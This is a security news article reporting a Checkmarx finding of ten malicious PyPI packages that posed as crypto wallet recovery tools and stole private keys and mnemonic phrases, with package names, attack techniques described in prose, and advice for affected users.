PyPI Supply Chain Attack: Fake Crypto Wallet Recovery Tools Found Stealing Private Keys and Mnemonic Phrases

A sophisticated supply chain attack targeting cryptocurrency users has been uncovered in the Python Package Index (PyPI) repository, where ten malicious packages masqueraded as wallet recovery and management utilities. Discovered by cybersecurity researchers at Checkmarx, the campaign specifically targeted users of major cryptocurrency wallets including MetaMask, Trust Wallet, Exodus, Atomic Wallet, Ronin, TronLink, and Phantom. As Bitcoin trades around $60,759 and Ethereum hovers near $2,350, the attack underscores the persistent threats facing crypto holders who rely on open-source software tools.

The Exploit Mechanics

The threat actor behind this campaign demonstrated a notably sophisticated approach to social engineering and code obfuscation. Ten packages were uploaded to PyPI with names carefully designed to attract developers and users in the cryptocurrency ecosystem: atomicdecoderss (366 downloads), trondecoderss (240 downloads), phantomdecoderss (449 downloads), trustdecoderss (466 downloads), exodusdecoderss (422 downloads), walletdecoderss (232 downloads), ccl-localstoragerss (335 downloads), exodushcates (415 downloads), cipherbcryptors (450 downloads), and ccl_leveldbases (407 downloads).

According to Checkmarx researcher Yehuda Gelb, the packages presented themselves as utilities for extracting mnemonic phrases and decrypting wallet data, appearing to offer valuable functionality for cryptocurrency users engaged in wallet recovery or management. However, they harbored hidden functionality designed to steal private keys, mnemonic phrases, transaction histories, and wallet balances.

Six of the identified packages included a dependency called cipherbcryptors to execute the malicious payload, while others relied on an additional package named ccl_leveldbases to obfuscate their true purpose. A notable aspect of the operation is that the malicious functionality was triggered only when certain functions were called — a departure from the typical pattern where such behavior activates automatically upon installation.

Affected Systems

The attack targeted a broad range of cryptocurrency wallets across multiple blockchain ecosystems. Users of Atomic Wallet, Trust Wallet, MetaMask, Ronin, TronLink, Exodus, and Phantom were all in the crosshairs. Each package attracted hundreds of downloads before being identified and removed, meaning potentially thousands of users were exposed to the threat.

The threat actor also manipulated download statistics displayed on PyPI, giving users the false impression that the packages were popular and widely trusted. Package descriptions included installation instructions, usage examples, and in one case even best practices for virtual environments — all designed to build credibility and reduce suspicion.

The Mitigation Strategy

What makes this attack particularly difficult to detect is the use of a dead drop resolver technique, classified as MITRE T1102/001. Rather than hard-coding the command and control server address within the packages, the attacker retrieved this information dynamically from external resources. This approach provides operational flexibility — the attacker can update server information without pushing package updates and can easily switch infrastructure if servers are taken down.

The captured data, including private keys and mnemonic phrases, was exfiltrated to a remote server controlled by the attacker. With this information, an attacker could gain full access to victim wallets and drain funds at any time.

Lessons Learned

This incident highlights several critical security principles for the cryptocurrency community. First, supply chain attacks targeting open-source repositories represent a growing threat vector that requires constant vigilance. The trust placed in package managers like PyPI is being systematically exploited by threat actors who invest significant effort in making malicious packages appear legitimate.

Second, the use of dead drop resolvers and delayed execution represents an evolution in attack sophistication that makes detection more challenging. Traditional security tools that scan for malicious behavior at installation time may miss threats that activate only when specific functions are called.

Third, the crypto community must develop better practices for verifying the authenticity of software tools. This includes verifying package maintainers, checking for typosquatting, reviewing source code when possible, and using virtual environments to limit the blast radius of compromised packages.

User Action Required

If you have installed any of the ten identified packages, take immediate action. Move your funds to a new wallet with a fresh seed phrase generated on a clean device. Scan your system for any additional malware that may have been installed as a secondary payload. Report the incident to relevant authorities and consider using hardware wallets for storing significant cryptocurrency holdings. Always verify package names carefully before installation and prefer official wallet recovery tools provided directly by wallet developers. With Bitcoin valued at over $60,000, the stakes of poor operational security have never been higher.

Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding threat mitigation.